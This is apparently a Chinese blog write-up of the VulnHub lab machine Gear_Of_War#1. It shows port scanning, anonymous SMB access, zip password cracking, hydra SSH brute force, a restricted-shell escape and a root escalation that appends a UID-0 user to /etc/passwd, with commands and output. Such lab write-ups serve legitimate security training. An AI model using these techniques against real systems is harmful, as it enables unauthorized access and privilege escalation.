14--VulnHub 靶机系列之Gear_Of_War#1
靶机下载地址:
https://download.vulnhub.com/gearsofwar/Gear_Of_War%231.ova
kali机(VMware)两张网卡:
第一张网卡使用VM0(桥接模式)-桥接到VirtualBox Host-Only Ethernet Adapter
第二张网卡使用NAT模式--用于访问网络
信息收集
kali机eth0的IP:192.168.56.129
扫描靶机的IP地址
arp-scan -l
通过靶机的MAC地址判断其IP
得到靶机的IP:192.168.56.129
扫描靶机开放的端口和服务
nmap -sS -sV -A -T4 -p- 192.168.56.129
┌──(root㉿kali)-[~] └─# nmap -sS -sV -T4 -A -p- 192.168.56.101 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-09 06:21 EST Nmap scan report for 192.168.56.101 Host is up (0.00047s latency). Not shown: 65531 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 09:03:8d:1f:f8:c9:d4:b4:43:b3:c3:73:12:ba:95:e1 (RSA) | 256 1b:a0:5f:3e:a2:6b:22:5a:81:c3:18:7e:5b:fc:d2:bd (ECDSA) |_ 256 18:1f:0c:d6:e7:2a:f5:5c:45:cb:8d:79:70:31:4b:7a (ED25519) 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) |_http-server-header: Apache/2.4.29 (Ubuntu) |_http-title: Site doesn't have a title (text/html). 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: LOCUST) 445/tcp open netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: LOCUST) MAC Address: 08:00:27:C6:C7:7B (Oracle VirtualBox virtual NIC) Device type: general purpose Running: Linux 3.X|4.X OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 OS details: Linux 3.2 - 4.9 Network Distance: 1 hop Service Info: Host: GEARS_OF_WAR; OS: Linux; CPE: cpe:/o:linux:linux_kernel Host script results: | smb-os-discovery: | OS: Windows 6.1 (Samba 4.7.6-Ubuntu) | Computer name: gears_of_war | NetBIOS computer name: GEARS_OF_WAR\x00 | Domain name: \x00 | FQDN: gears_of_war |_ System time: 2024-12-09T11:22:09+00:00 | smb2-time: | date: 2024-12-09T11:22:09 |_ start_date: N/A | smb2-security-mode: | 3:1:1: |_ Message signing enabled but not required |_clock-skew: mean: -2s, deviation: 0s, median: -2s | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) |_nbstat: NetBIOS name: GEARS_OF_WAR, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown) TRACEROUTE HOP RTT ADDRESS 1 0.47 ms 192.168.56.101 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ Nmap done: 1 IP address (1 host up) scanned in 19.07 seconds
开放端口:22、80、139、445
扫描80端口下存在的目录和文件
方法一:dirb http://192.168.56.101
+ http://192.168.56.101/index.html (CODE:200|SIZE:200) + http://192.168.56.101/robots.txt (CODE:200|SIZE:64) + http://192.168.56.101/server-status (CODE:403|SIZE:279)
只有robots和index.html
方法二:dirsearch -u http://192.168.56.101
结果和方法一一致,只不过多了没用的隐藏文件
方法三:gobuster dir -u http://192.168.56.101 -w /usr/share/wordlists/SecLists-master/Discovery/Web-Content/big.txt -x .php,.txt,.html,.zip
要先获得SecLists-master,可以在github下载得到
/dom.html /index.html /marcus.html /robots.txt
得到四个,所以我们一般使用gobuster进行扫描web下的目录和文件
浏览器访问得到的URL
在robots.txt下发现重要内容
/marcus.html /dom.html /cole.html /baird.html /acarmine.html
这五个文件访问后,得到的是图片,疑似是外国电影中的虚拟人物,可能要从图片中得到什么内容或是查看源码
在index.html中发现
一张类似游戏中一个场景的图片
http://192.168.56.101下发现:
Apache2 Ubuntu Default Page 网页
看不出什么内容
回到扫描出的端口中
通过nmap -sS -sV -A -T4 -p- 192.168.56.100
得到开放的端口22(ssh)、80(http)、139,445(Samba)
Samba 服务的主要功能: 文件共享(File Sharing): Samba 允许 Linux/Unix 系统和 Windows 系统之间共享文件。例如,你可以在 Linux 系统上设置一个文件夹并让 Windows 机器访问该文件夹,就像 Windows 本地的共享文件夹一样。 打印机共享(Printer Sharing): Samba 还支持将打印机从 Linux/Unix 机器共享到 Windows 系统,使 Windows 用户能够通过 Samba 共享的打印机进行打印。 Windows 网络集成: Samba 支持 Windows 的 工作组 和 域(Domain)模式,允许 Linux/Unix 机器加入到 Windows 的网络环境中,实现身份验证、访问控制等功能。 例如,你可以让 Linux 机器成为一个 Windows 域的成员,进行域级别的认证和资源访问控制。 提供 Windows 网络功能: Samba 还支持 NetBIOS 和 DNS,使得基于 Windows 的网络功能(如计算机名解析、资源共享)在 Linux/Unix 系统上得以实现。
由于前面未得到暴露出的权限信息
这里是大概率是要进行samba服务的渗透
漏洞利用
SMB探测
由于没有用户名和密码,所以不进行下面的命令去列出共享的目录和文件
smbclient -L //192.168.56.101 -U ""
发现smb
smbmap -H 192.168.56.101
[+] IP: 192.168.56.101:445 Name: 192.168.56.101 Status: AuthenticatedDisk Permissions Comment---- ----------- -------LOCUS_LAN$ READ ONLY LOCUST FATHERIPC$ NO ACCESS IPC Service (gears_of_war server (Samba, Ubuntu))
得到文件夹LOCUS_LAN$
访问smb
smbclient //192.168.56.101/LOCUS_LAN$
┌──(root㉿kali)-[~] └─# smbclient //192.168.56.101/LOCUS_LAN$ Password for [WORKGROUP\root]: Anonymous login successful Try "help" to get a list of possible commands. smb: \>
help
ls
get msg_horda.zip
get SOS.txt quit
smb: \> get msg_horda.zip getting file \msg_horda.zip of size 332 as msg_horda.zip (108.1 KiloBytes/sec) (average 108.1 KiloBytes/sec) smb: \> get SOS.txt getting file \SOS.txt of size 198 as SOS.txt (64.5 KiloBytes/sec) (average 86.3 KiloBytes/sec) smb: \>
获取了一个压缩包一个文件
生成密码字典
获得提醒
cat SOS.txt
This is a message for the Delta Team. I found a file that contains a password to free ........ oh no they here!!!!!!!!!!, i must protect myself, please try to get the password!! [@%%,] -Hoffman.
这是给 Delta Team 的一条信息。 我找到一个文件,里面包含了解锁……的密码……哦不,他们来了!!!!! 我必须保护自己,请你们试着找到密码!! [@%%,] Hoffman。
尝试解压zip文件
unzip msg_horda.zip
┌──(root㉿kali)-[~] └─# unzip msg_horda.zip Archive: msg_horda.zip [msg_horda.zip] key.txt password:
没有密码!!!
下面就是使用工具进行爆破zip解压需要的密码了!!
使用crunch生成字典
crunch 4 4 -t @%%, -o list.txt
┌──(root㉿kali)-[~] └─# crunch 4 4 -t @%%, -o list.txt Crunch will now generate the following amount of data: 338000 bytes 0 MB 0 GB 0 TB 0 PB Crunch will now generate the following number of lines: 67600 crunch: 100% completed generating output
fcrackzip -D -u -p list.txt msg_horda.zip
┌──(root㉿kali)-[~] └─# fcrackzip -D -u -p list.txt msg_horda.zip PASSWORD FOUND!!!!: pw == r44M
得到密码解压密码:r44M
解压zip文件获取信息
┌──(root㉿kali)-[~] └─# unzip msg_horda.zip Archive: msg_horda.zip [msg_horda.zip] key.txt password: inflating: key.txt
得到一个key.txt文件
┌──(root㉿kali)-[~] └─# cat key.txt "Vamos a atacar a los humanos con toda nuestras hordas, por eso puse en prision a el hombre mas peligroso que tenian, por lo que sin el son debiles." [[[[[[[[[[[[[[[[[[[[["3_d4y"]]]]]]]]]]]]]]]]]]]] -General RAAM.
得到3_d4y
疑似是一个密码,这里猜测是ssh的密码
由于前面没有得到什么关键信息
直接使用暴力破解ssh用户
探测ssh
暴力猜解账户
cd /usr/share/wordlists
ls
gunzip rockyou.txt.gz
┌──(root㉿kali)-[~] └─# cd /usr/share/wordlists ┌──(root㉿kali)-[/usr/share/wordlists] └─# ls amass dnsmap.txt john.lst nmap.lst SecLists-master.zip wifite.txt dirb fasttrack.txt legion rockyou.txt.gz sqlmap.txt dirbuster fern-wifi metasploit SecLists-master wfuzz┌──(root㉿kali)-[/usr/share/wordlists] └─# gunzip rockyou.txt.gz
cd
hydra -L /usr/share/wordlists/rockyou.txt -p 3_d4y ssh://192.168.56.101
┌──(root㉿kali)-[~] └─# hydra -L /usr/share/wordlists/rockyou.txt -p 3_d4y ssh://192.168.56.101 Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway). Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-12-09 07:55:37 [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4 [DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:14344399/p:1), ~896525 tries per task [DATA] attacking ssh://192.168.56.101:22/ [STATUS] 352.00 tries/min, 352 tries in 00:01h, 14344051 to do in 679:11h, 12 active [22][ssh] host: 192.168.56.101 login: marcus password: 3_d4y
得到账户 marcus/3_d4y
权限提升
登陆ssh
ssh marcus@192.168.56.101
3_d4y
marcus@gears_of_war:~$
ls -al
cd jail
marcus@gears_of_war:~$ ls -al total 40 drwxrwxrwx 6 marcus marcus 4096 Oct 17 2019 . drwxr-xr-x 4 root root 4096 Oct 17 2019 .. -rw------- 1 marcus marcus 17 Oct 17 2019 .bash_history -rwxrwxrwx 1 marcus marcus 220 Apr 4 2018 .bash_logout -rwxrwxrwx 1 marcus marcus 3771 Apr 4 2018 .bashrc drwxrwxrwx 2 marcus marcus 4096 Oct 16 2019 .cache drwxrwxrwx 3 marcus marcus 4096 Oct 16 2019 .gnupg drwxrwxrwx 2 marcus marcus 4096 Oct 17 2019 jail drwxrwxrwx 3 marcus marcus 4096 Oct 16 2019 .local -rwxrwxrwx 1 marcus marcus 670 Oct 17 2019 .profile
只有一个文件夹jail,访问被限制了!!!
marcus@gears_of_war:~$ cd jail -rbash: cd: restricted marcus@gears_of_war:~$ ls
绕过低权限用户的shell的配置文件
ssh marcus@192.168.56.101 -t "bash -noprofile"
通过 SSH 登录到 192.168.56.101 主机上的 marcus 用户,并启动一个新的 Bash shell,且不加载任何用户的配置文件。-t 选项确保了命令在交互式环境下正常工作。这样做通常用于绕过某些限制性 shell 设置,确保以更干净、更受控制的方式进入 Bash 环境。
3_d4y
marcus@gears_of_war:~$ cd jail/ marcus@gears_of_war:~/jail$ ls marcus@gears_of_war:~/jail$ ls -al total 8 drwxrwxrwx 2 marcus marcus 4096 Oct 17 2019 . drwxrwxrwx 6 marcus marcus 4096 Oct 17 2019 ..
啥都没有,被耍了!
查找具有 setuid 权限的可执行文件
find / -type f -perm -u=s 2>/dev/null
/usr/bin/passwd
一个重要的漏洞,passwd有setuid权限,直接进行创建用户!
利用passwd创建用户
openssl passwd -1 -salt abc 123
marcus@gears_of_war:~/jail$ openssl passwd -1 -salt abc 123 $1$abc$98/EDagBiz63dxD3fhRFk1 marcus@gears_of_war:~/jail$
添加用户和密码及其他信息至passwd文件中
cat /etc/passwd > /tmp/passwd2
vim /tmp/passwd2 abc:$1$abc$98/EDagBiz63dxD3fhRFk1:0:0:root:/root:/bin/bash
marcus@gears_of_war:~/jail$ cat /etc/passwd > /tmp/passwd2 marcus@gears_of_war:~/jail$ vim /tmp/passwd2 marcus@gears_of_war:~/jail$ cat /tmp/passwd2 root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin syslog:x:102:106::/home/syslog:/usr/sbin/nologin messagebus:x:103:107::/nonexistent:/usr/sbin/nologin _apt:x:104:65534::/nonexistent:/usr/sbin/nologin lxd:x:105:65534::/var/lib/lxd/:/bin/false uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin pollinate:x:109:1::/var/cache/pollinate:/bin/false sshd:x:110:65534::/run/sshd:/usr/sbin/nologin marcus:x:1000:1000:marcus:/home/marcus:/bin/rbash abc:$1$abc$98/EDagBiz63dxD3fhRFk1:0:0:root:/bin/bash marcus@gears_of_war:~/jail$
cp /tmp/passwd2 /etc/passwd
切换用户
su abc
123
whoami
pwd
id
cd /root
ls -al
marcus@gears_of_war:~/jail$ su abc Password: # id uid=0(root) gid=0(root) groups=0(root) # whoami root # pwd /home/marcus/jail # cd /root # ks sh: 5: ks: not found # ls # ls -al total 52 drwx------ 6 root root 4096 Oct 17 2019 . drwxr-xr-x 24 root root 4096 Oct 16 2019 .. -rw------- 1 root root 216 Oct 17 2019 .bash_history -rw-r--r-- 1 root root 3106 Apr 9 2018 .bashrc drwx------ 2 root root 4096 Oct 17 2019 .cache -rw-r--r-- 1 root root 12732 Oct 17 2019 .flag.txt drwx------ 3 root root 4096 Oct 17 2019 .gnupg drwxr-xr-x 3 root root 4096 Oct 16 2019 .local -rw-r--r-- 1 root root 148 Aug 17 2015 .profile drwx------ 2 root root 4096 Oct 16 2019 .ssh # cat .flag.txt
获得flagcat .flag.txt
.flag.txt内容
# cat .flag.txt.,*,, .*(((#((((*,. ,*/,,,..*/(((/*/#(. .*//*((####(/,,*,/(#(* ..,*//((*, ....**/**(##########%#(*,*(#/. .*/((#######((*. ..,*..*,,**///*,,,/(################(//*,. .,/(((((((((((####/.. ...,,*,****,,*/#####################*/(,. .,/(((/((#(##########(,.,,,,//((/*/(####(##################(///. ,*(##(#((((/#######%#(###(##################################/((* .*((#/*/(/(#############(#######################(#((#(######*((* .*((((#####################################(########((######**/*. ,/##((###########################################(##########*,(///. *(((###%#####################################################(,****, .,/(##(#######%%#####%############(#(############################(***,. .**(##%##%###(#####((###############%######//,,*/((###################(,... ./(##((##%#(##(/(((((##########################/*. *(############%####(,. . **(####((###((///####%######################%####(*, ,((###############* .,//*/((((#((/*,,*##################################((/ ./(#%#####%###%###/*****,. ..*//(/*/#(((/(//*/#####################################(/. ./#####%#%#################*. .,,,*//.**((#(/####(#((((,,(#######################################(* ./(######################(/ ,,,/(**((((*///(#(#####(/,../################(#(###(##################( ,((%##############((((#((. .,*///(####(//(((######((. ,/##################################%######( .*(####%########(##(####* .**/((((##(((*//(/((###((*. ./((####################(###################( .*(#########(#####(####( .,***/(///(((/##(/((####(* .,*(###########################(##############*. .*(###%#######/(((##(##, ,*//*/((//(####(((((#/((,. .*##((####################(############(####/(/,, ./(#######((((#((####(* ,/(((((((#(((((//##(((/. ,*#%#####%#########################/,. .*##/*((** ,/################(* .*(/((//((/((((((/((//, */##############################/. *#((//#(,. ,(##############/ ,/((##(((((##(*///*, .*(#%########(########%########(* ,(#(//##* *(##%########(. ./((/###(#(((((((// ./#####%##%###(((#((############/ ./###((((* ,(###%######(* .*###(##(/(#(#((/, ,/###########( .(####(###*. .,/######(*/* ./###########/ ,/(##(#######/(, ,/(###(/##(/. /##########(##(############((. ./#########%#( /(###((#####/, ,*((((####, ./#####/,((#################(/, ./###########/ /#########((/, */##(/(#/. *###, (( .##############(/(/. ./##%#######(/ (###########(, .(((#(*//* .,(((### (. *(#(######(#(*..*/, ,(#(##%####((/ ./(####(#####/. ,((##/,(#############* (, ,(##(#####(*. ....,. *(##%##(##((/, .*(((##(####%#/ .*((###/(#############(, .(#######(/((##. . ,. ,, .(#######(//*//. .*/((#(#######(, ,/#((/((##(##(################(#(##((##(/(. . *##(######/(/(#/* ,/((//((#######(*, ,*/(//((#############(########(#*,*...,*/ * ,#######(#/(###(**/, ,(####/(#######(((/, ,*//*/##((#((#(#######,((.,#, *,*.,..,*..(. .##########(((/**,. .,*(**(#####%#######(*. ..,*(((**..((((####,,,,#*/*..,,. ,/*/,**/, ./#%####((##/***, ..//(/*(################(,, .**,,/. ./(##/*(.* ...*(.,*,* *((##(/. ./###%#((((##(/(((**/***,. ,**((/((#################//*. ,/**#* ,((((/*/ , .,.*(.**/((###### *(##((#(######(//*//((/*,. *(#(*/(/####(##############((/, ,(##. *(#*,*.(*#* .((//##%##((( ,*(###((((###(######/*,*,. ..,*((/#(((##(################((**. ,####//((###(##/((((#######((/. .*/(###(((((########*/,**,.. ...,/#(#//########%#%###########(/**,. *####################%%#(#(*. ,((##((((#/(((#%%#((///*,,. ..*(##((######%#%###############(//**, .##################%###/. .,/(#######(##((//(//**,. .,*/(########%#####################((/*,. *####%#%%%########(/* .*/((######%%#(* .,***//((((#####%###################((/**.. ,/######((*. ,*(####%########(((**. .,**,****/**/**//***####################(/**,*,,... .,**/*.. ..,,,*/((#####%##########(/. ..,,********,,((####################(#(///******/*///(((###########%#####%###(/. . ,*******/(###################((#################################(###/, .,,,/**/##################(#######(#########################((####, .*/*/#######################################################(#(. .//############((((########(#######################((####((/*. . ,(##########(((((((###########################((###(((((((*, . .((############((((###(*,,*//*///*//(##%############((//**/*, .*(######(#(#######(**, .*(#######((((/(//**,, . ,*/#####((((((##/, .*. ./###((((,. .,.,,//#########*.. . ,, /((/(/*, . . . ,../(#####(*/ . . .. * .. .,/(#*. . . .,../#, . . . . . .#/ . . .. .#/ . #/ . .(/ . /# . ,(. . . .. ,(( . Congratulation you got out of the jail and finish this Episode#1! Please share and support me on twitter! Twitter: @sir809 #
相关文章:
14--VulnHub 靶机系列之Gear_Of_War#1
靶机下载地址: https://download.vulnhub.com/gearsofwar/Gear_Of_War%231.ova kali机(VMware)两张网卡: 第一张网卡使用VM0(桥接模式)-桥接到VirtualBox Host-Only Ethernet Adapter 第二张网卡使用NAT模式--用于访问网络 信息收集 kali机eth0的I…...
Python + OpenCV 系列:图像阈值处理
文章目录 引言 1. 阈值处理的基本概念2. OpenCV 中的阈值处理3. 常见的阈值类型3.1 二值化阈值3.2 反向二值化阈值3.3 截断阈值3.4 平滑阈值 4. 自适应阈值5. Otsu’s 阈值法6. 阈值处理的应用场景7. 总结 引言 图像阈值处理是计算机视觉和图像处理中一种非常基础而重要的技术…...
el-thee懒加载删除某条数据 ,el-thee懒加载重置,el-thee刷新某个节点
一、懒加载的tree已经全部展开,外部点击删除的时候不需要重新展开点击获取下一层数据 <template> <el-treeref"tree":data"treeData":props"defaultProps"render-after-expandhighlight-currentlazy:expand-on-click-node&q…...
如何在 JavaScript 中设置定时器?
在 JavaScript 中,设置定时器通常使用两个内置的函数:setTimeout() 和 setInterval()。它们允许你在指定的时间延迟后执行某个函数或者以某个间隔反复执行某个函数。下面,我将结合实际项目代码示例讲解如何使用它们。 1. setTimeout() — 延…...
LDR6500:音频双C支持,数字与模拟的完美结合
在当今数字化快速发展的时代,音频设备的兼容性和性能成为了用户关注的重点。LDR6500,作为乐得瑞科技精心研发的USB Power Delivery(PD)协议芯片,凭借其卓越的性能和广泛的应用兼容性,为音频设备领域带来了新…...
小型项目的数据库适合选用ClickHouse吗?
我们与MySQL比较。 MySQL 1. 传统的业务系统 用户管理订单处理产品信息企业基础数据 2. 特点 行存储,适合频繁的增删改事务支持完善小规模数据查询性能好数据一致性保证生态系统成熟,运维简单 ClickHouse 1. 数据分析场景 日志分析用户行为分析实…...
MySQL--》如何在SQL中巧妙运用函数与约束,优化数据处理与验证?
目录 函数使用 字符串函数 数值函数 日期函数 流程函数 约束 函数使用 函数是指一段可以直接被另一段程序调用的程序或代码,在mysql当中有许多常见的内置函数,接下来开始对这些内置函数及其作用进行简单的讲解和使用: 字符串函数 my…...
鸿蒙HarmonyOS应用开发 探索 HarmonyOS Next-从开发到实战掌握 HarmonyOS Next 的分布式能力
鸿蒙心路旅程:探索 HarmonyOS Next-从开发到实战掌握 HarmonyOS Next 的分布式能力 HarmonyOS Next 是华为推出的全新一代操作系统,旨在进一步推动分布式技术的深度应用和生态融合。本文将从技术特点、应用场景入手,通过实战案例与代码示例&…...
JavaWeb 9 MySQL DDL DML
前言 1、什么是数据库? 数据库:英文为 DataBase,简称DB,它是存储和管理数据的仓库 2、目前主流的关系型数据库有哪些? 目前主流的关系型数据库:(SQL语句是操作关系型数据库的统一标准&#x…...
哑资源对于通信行业的重要性以及哑资源管理的难点
一、哑资源定义与分类 1.1 哑资源概念界定 哑资源(Dumb Resources)在通信行业中指的是那些不具备智能处理能力的物理设备和设施。这些资源虽然不直接参与数据的生成和处理,但它们是通信网络正常运行的基础。哑资源包括但不限于电缆、天线、…...
聊聊大语言模型的上下文处理能力基本概念
一、Llama3的上下文处理能力 Llama 3不同版本的上下文处理能力有所不同: Llama 3基础版本:上下文长度一般为8k tokens左右,约相当于6,000字或10页文档.Llama 3.1版本:将上下文窗口提升到了128k tokens,这使得模型在处…...
总结几种不同风格的学术论文ChatGPT提示词
目录 1.不同写作风格的重要性 2.叙事写作 3.描述性写作 4.说明性写作 5.讨论性写作 小编先跟宝子们来看看一篇学术论文或者研究论文的基本组成部分,有助于后续提示词说明的整体结构和有效性: 引言:引言是写作的开篇部分,作者…...
鸿蒙技术分享:鸿蒙元服务踩坑血泪:文件下载、选择、打开
鸿蒙元服务踩坑:文件下载、选择、打开 因为项目有开发元服务的需求,因此需要将原本给应用开发封装的文件操作相关代码拿到元服务里用。本以为也没很复杂的功能,直接用应该问题不大,结果还是踩了坑…… 原本给应用使用的代码请查…...
12月通信基础知识补充2
看文献过程中不断发现有太多不懂的基础知识,故长期更新这类blog不断补充在这过程中学到的知识。由于这些内容与我的研究方向并不一定强相关,故记录不会很深入请见谅。 【通信基础知识补充6】12月通信基础知识补充2 一、Walsh码1.1 Walsh码的基本特性1.2 …...
佑驾创新冲刺上市:交付进度延后,研发投入缩减,刘国清为实控人
近日,深圳佑驾创新科技股份有限公司(MINIEYE,下称“佑驾创新”)通过港交所聆讯并披露了聆讯后资料集(即招股书)。据贝多财经了解,佑驾创新获得了IPO备案通知书,拟在港交所上市。 对…...
【Linux系列】Linux 防火墙的详细学习
💝💝💝欢迎来到我的博客,很高兴能够在这里和您见面!希望您在这里可以感受到一份轻松愉快的氛围,不仅可以获得有趣的内容和知识,也可以畅所欲言、分享您的想法和见解。 推荐:kwan 的首页,持续学…...
使用 Trace 实现 onnx 的导出 - 学习记录
使用 Trace 实现 onnx 的导出 一、使用 Trace 实现 onnx 的导出的流程二、代码分解2.1、定义模型2.2、分析模型操作类型2.3、构建钩子函数2.3.1、定义 hook 函数2.3.2、注册 Conv2d - hook 函数2.3.3、注册 ReLU - hook 函数2.3.4、注册 Add - hook 函数三、完整导出 onnx 代码…...
python字符串处理基础操作总结
1.去掉空格或者特殊符号 input_str.strip() #去掉所有空格 input_str.lstrip() #去掉左边空格 input_str.rstrip() #去掉右边空格 def print_hi():input_str 今天天气不错,风和日丽 out input_str.strip()print(input_str)print(out)if __name__ __main__:print…...
AI如何让PPT制作变得轻松与智能?用一键生成ppt!
谁还愿意把时间浪费在PPT的设计和内容排版上?尤其是对于那些需要频繁制作演示文稿的人来说,一份看起来专业的PPT往往会让人陷入“做与不做”的困境。但随着科技的飞速发展,传统的PPT制作方法正逐渐被更为高效的工具所取代,尤其是智…...
机器人世界手眼标定函数calibrateRobotWorldHandEye()的使用)
OpenCV相机标定与3D重建(11)机器人世界手眼标定函数calibrateRobotWorldHandEye()的使用
操作系统:ubuntu22.04 OpenCV版本:OpenCV4.9 IDE:Visual Studio Code 编程语言:C11 算法描述 计算机器人世界/手眼标定: w T b _{}^{w}\textrm{T}_b wTb 和 c T g _{}^{c}\textrm{T}_g cTg。 cv::calibrateRobotWorldHa…...
vscode通过ssh连接虚拟机进行开发
虚拟机自带的vscode很卡而且画质感觉不行,所以用这种方法解决 1.VSCODE安装扩展Tabnine(AI代码补全),Remote Development 2.虚拟机终端ifconfig查看本机ip 192.168.43.197 开启ubuntu的SSH服务 sudo apt-get install openssh-server 配置vscode的ssh …...
)
TCP/IP协议详解(小白)
TCP/IP协议详解 TCP/IP协议包含了一系列的协议,也叫TCP/IP协议族(TCP/IP Protocol Suite,或TCP/IP Protocols),简称TCP/IP。TCP/IP协议族提供了点对点的连结机制,并且将传输数据帧的封装、寻址、传输、路由…...
手机租赁系统开发全面解析与实现指南
内容概要 手机租赁系统的设计理念是为了满足用户对便捷、灵活的手机使用需求。想象一下,谁还愿意花大价钱买一部手机呢?尤其是当新款手机频繁推出时,租赁似乎成了更受欢迎的选择。这个系统旨在让用户可以随时随地选择租用不同型号的手机&…...
洛谷【排序】算法的题单 - 笔记
2024-12-09 - 第 37 篇 洛谷【排序】题单 - 笔记 作者(Author): 郑龙浩 / 仟濹(CSND账号名) 洛谷【排序】题单合集 一、排序算法都有… 1. 简单排序算法 这些算法通常是基础的排序方法,容易理解和实现,但效率较低,适用于数据量较小的情况…...
《筑牢网络安全防线:守护数字时代的生命线》
《筑牢网络安全防线:守护数字时代的生命线》 一、网络安全的重要性二、网络安全面临的挑战三、网络安全技术四、网络安全案例分析五、如何加强网络安全防护六、结论 一、网络安全的重要性 网络安全在当今数字化时代的重要性不言而喻,它涵盖了多个关键领…...
与cad交互)
VB.net进行CAD二次开发(二)与cad交互
开发过程遇到了一个问题:自制窗口与控件与CAD的交互。 启动类,调用非模式窗口 Imports Autodesk.AutoCAD.Runtime Public Class Class1 //CAD启动界面 <CommandMethod("US")> Public Sub UiStart() Dim myfrom As Form1 New…...
Python函数——函数的返回值定义语法
一、引言 在Python中,函数的返回值是其核心功能之一,它使得函数能够将计算结果传递给调用者,进而推动程序的逻辑和功能实现。理解和掌握函数的返回值语法,不仅能够提高代码的模块化和可读性,还能使程序更加高效和灵活…...
Python 布尔索引筛选数据
Python 布尔索引筛选数据 1. 布尔索引筛选数据1.1. 根据布尔索引对矩阵元素进行赋值1.2. 根据布尔索引对矩阵元素进行赋值1.3. 根据布尔索引对矩阵元素进行赋值 2. logits[logits < values[:, [-1]]] -1000References 1. 布尔索引筛选数据 布尔索引允许通过条件筛选矩阵中…...
mybatis缓存
一级缓存和二级缓存范围不一样 只缓存查询,缓存增删改没有意义 先在mybatis-config.xml加入 <setting name"cacheEnabled"value"true"/> 在mapper.xml中开启二缓存 <!--回收策略为先进先出,每隔60秒刷新一次,…...
Linux下的编程
实验7 Linux下的编程 一、实验目的 熟练掌握Linux下Python编程的方法、函数调用方法以及shell编程中的控制结构。 二、实验环境 硬件:PC电脑一台,网络正常。 配置:win10系统,内存大于8G ,硬盘500G及以上。 软件&a…...
使用Java创建RabbitMQ消息生产者的详细指南
目录 在现代分布式系统中,消息队列是实现异步通信的重要工具。RabbitMQ作为一种流行的开源消息代理,支持多种消息协议,广泛应用于微服务架构和事件驱动的应用程序中。本文将深入探讨如何使用Java创建RabbitMQ的消息生产者,发送消息…...
笔记本外接显示屏没声音
1、笔记本正常有声音,但是外接显示屏后没有声音了怎么回事呢?原来外接显示屏后笔记本的声音输出会自动选择显示屏的音频输出,但是显示屏可能没有声音输出所以导致笔记本没有声音。 2、解决办法:打开笔记本设置,选择声…...
【Linux】Linux权限管理:文件与目录的全面指南
在Linux系统中,权限管理是确保数据安全的关键。本文将为大家介绍Linux文件与目录的权限管理,帮助你理解如何设置和管理访问权限。无论你是新手还是有经验的用户,这里都将提供实用的技巧和知识,助你更好地掌握Linux环境。让我们一起…...
并发在前端中的应用?
并发在前端中的应用主要体现在处理多个请求和优化页面加载速度方面。前端并发处理通常涉及在极短时间内发送多个数据请求,例如在页面渲染时同时请求多个数据。通过并发处理,可以显著减少页面加载时间,提升用户体验。 前端并发处理的具体…...
Spring Boot助力,一键解锁招聘全流程信息精细化管理
2系统相关技术 2.1 Java语言介绍 Java是由SUN公司推出,该公司于2010年被oracle公司收购。Java本是印度尼西亚的一个叫做爪洼岛的英文名称,也因此得来java是一杯正冒着热气咖啡的标识。Java语言在移动互联网的大背景下具备了显著的优势和广阔的前景&#…...
沉浸式多用户跟踪解决方案
沉浸式多用户VR跟踪解决方案,支持使用HTC VIVE或Valve Index等消费级虚拟现实头盔在房间内执行大范围多用户跟踪。该解决方案不仅能够跟踪处于坐姿或其他静止用户的头部和控制器,还支持房间内多用户动态跟踪。 通常房间内的跟踪受限于特定的系统能力&…...
)
“切片赋值”创建列表批量操作“新”方法(Python)
[start:end]切片赋值,扩展了list批量增减元素的操作能力。 (笔记模板由python脚本于2024年12月06日 15:07:56创建,本篇笔记适合研python基础的coder翻阅) 【学习的细节是欢悦的历程】 Python 官网:https://www.python.org/ Free:…...
Linux中-vvv详细输出命令
在 Shell 脚本中,有时会看到某些命令后面加上 -vvv 或类似的选项。这个选项的作用通常与命令的 **调试模式** 或 **详细输出** 相关。不同的命令和工具对于选项的解释和处理方式不同,因此 -vvv 的具体含义取决于它所跟随的命令。 ### 一般来说ÿ…...
获取淘宝商品评论数据的API应用:市场调研|产品更新|用户数据
下面是一段我用item_review(获取商品评论数据)抓来的商品评论数据: "items": {"total_results": 375,"totalpage": 38,"page_size": 10,"page": "1","item": [{&quo…...
VRRP的知识点总结及实验
